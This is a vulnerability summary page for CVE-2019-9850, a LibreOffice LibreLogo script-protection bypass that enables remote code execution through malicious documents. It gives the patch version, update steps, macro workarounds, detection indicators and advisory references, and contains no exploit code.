CVE-2019-9850
📋 TL;DR
This vulnerability allows attackers to bypass LibreOffice's script execution protection through insufficient URL validation. Malicious documents can execute arbitrary Python commands via LibreLogo from script event handlers, leading to remote code execution. Users of LibreOffice versions prior to 6.2.6 are affected.
💻 Affected Systems
- LibreOffice
📦 What is this software?
Fedora by Fedoraproject
Fedora by Fedoraproject
Leap by Opensuse
Leap by Opensuse
Libreoffice by Libreoffice
Ubuntu Linux by Canonical
Ubuntu Linux by Canonical
Ubuntu Linux by Canonical
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise through remote code execution when a user opens a malicious document, potentially leading to data theft, ransomware deployment, or persistent backdoor installation.
Likely Case
Attackers deliver malicious documents via email or downloads, exploiting user trust to execute arbitrary code on the victim's system with the user's privileges.
If Mitigated
With proper patching and user awareness, impact is limited as exploitation requires user interaction to open malicious documents.
🎯 Exploit Status
Exploitation requires user interaction to open a malicious document. Public proof-of-concept exists in security advisories.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 6.2.6 or later
Vendor Advisory: https://www.libreoffice.org/about-us/security/advisories/cve-2019-9850/
Restart Required: No
Instructions:
1. Update LibreOffice to version 6.2.6 or later using your distribution's package manager or official installer. 2. For Linux: Use 'sudo apt update && sudo apt upgrade libreoffice' (Debian/Ubuntu) or equivalent for your distribution. 3. For Windows/macOS: Download and install the latest version from libreoffice.org.
🔧 Temporary Workarounds
Disable LibreLogo macro execution
allPrevent LibreLogo from executing Python commands by disabling macro execution in LibreOffice settings.
Not applicable - GUI configuration only
Use macro security settings
allSet LibreOffice to only run macros from trusted sources or disable all macros.
Not applicable - GUI configuration only
🧯 If You Can't Patch
- Implement application whitelisting to prevent unauthorized LibreOffice execution
- Use email filtering to block documents with embedded scripts and train users not to open untrusted documents
🔍 How to Verify
Check if Vulnerable:
Check LibreOffice version: If version is below 6.2.6, the system is vulnerable.Check Version:
libreoffice --version (Linux/macOS) or check Help > About LibreOffice (Windows)Verify Fix Applied:
Confirm LibreOffice version is 6.2.6 or higher after update.📡 Detection & Monitoring
Log Indicators:
- Unusual LibreOffice process spawning child processes
- Python interpreter execution triggered by LibreOffice
Network Indicators:
- LibreOffice making unexpected network connections after document opening
SIEM Query:
Process creation where parent process contains 'libreoffice' and child process contains 'python' or unusual command execution🔗 References
- http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00006.html
- http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00067.html
- https://lists.debian.org/debian-lts-announce/2019/10/msg00005.html
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PMEGUWMWORC3DOVEHVXLFT3A5RSCMLBH/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WVSDPZJG3UA43X3JXRHJAWXLDZEW77LM/
- https://seclists.org/bugtraq/2019/Aug/28
- https://usn.ubuntu.com/4102-1/
- https://www.debian.org/security/2019/dsa-4501
- https://www.libreoffice.org/about-us/security/advisories/CVE-2019-9850
- http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00006.html
- http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00067.html
- https://lists.debian.org/debian-lts-announce/2019/10/msg00005.html
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PMEGUWMWORC3DOVEHVXLFT3A5RSCMLBH/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WVSDPZJG3UA43X3JXRHJAWXLDZEW77LM/
- https://seclists.org/bugtraq/2019/Aug/28
- https://usn.ubuntu.com/4102-1/
- https://www.debian.org/security/2019/dsa-4501
- https://www.libreoffice.org/about-us/security/advisories/CVE-2019-9850
